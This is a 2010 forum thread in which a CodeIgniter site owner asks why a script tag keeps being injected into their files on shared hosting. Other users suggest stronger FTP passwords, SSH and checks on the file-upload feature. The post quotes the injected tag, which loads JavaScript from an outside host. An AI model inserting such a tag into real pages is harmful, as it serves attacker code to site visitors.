Page 1 of 1

script tag inserted

Posted: Fri Jul 09, 2010 4:40 am
by junjustkim
hi to all

I am using codeigniter framework for my website and hosted on shared hosting server. Most of my index.php, home.php, index.html and other .js, at the end of the file there was inserted script like below, it was using different value on src="" . Is this the Cross-site scripting? How they inject to my file? I used 755 as file permission. How to prevent this because I've encounterd this twice. Even I replaced all files it will attack again. Additionally, not only one domain is being attack almost all hosted on that server.


<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->

Re: script tag inserted

Posted: Fri Jul 09, 2010 7:12 am
by timWebUK
Change your FTP password to something more secure - more than 8 characters, upper case, lower case, integers and symbols.

Re: script tag inserted

Posted: Sat Jul 10, 2010 6:16 am
by junjustkim
hi timWebUK,

Thanks for your immediate replied. I already change my ftp password, but hacker still attacked my site. To all the expert please give me an advise or any suggestion to protect my site. I don't know what to do. I already report it on the technical support of my hosting but they said that there is something wrong with my code.

Please help me


Thanks

Re: script tag inserted

Posted: Sun Jul 11, 2010 3:22 am
by kaisellgren
Use SSH when transferring files to the server.

You might have a vulnerability in your application. It's hard to guess. Are you doing any sort of file uploading on your site?

Re: script tag inserted

Posted: Sun Jul 11, 2010 8:33 pm
by junjustkim
hi kaisellgren,

At first, thank you for your help and suggestion. Does any one knows how the hacker could inserted this script? Any thought about this?

I have file uploading to mysite.


Thanks
Tirso

Re: script tag inserted

Posted: Tue Jul 13, 2010 2:38 am
by timWebUK
junjustkim wrote: I have file uploading to mysite.
Chances are your file upload is insecure and they are exploiting it. If you post your code, we may be able to assist.

Re: script tag inserted

Posted: Tue Jul 13, 2010 11:53 am
by Ragnis
Very likely teh hacker just uploaded a php file and then executed it by going to yourdomain.com/files/hackerfile.php.

To prevent futher attacks you should put some kind of file extension check to your upload.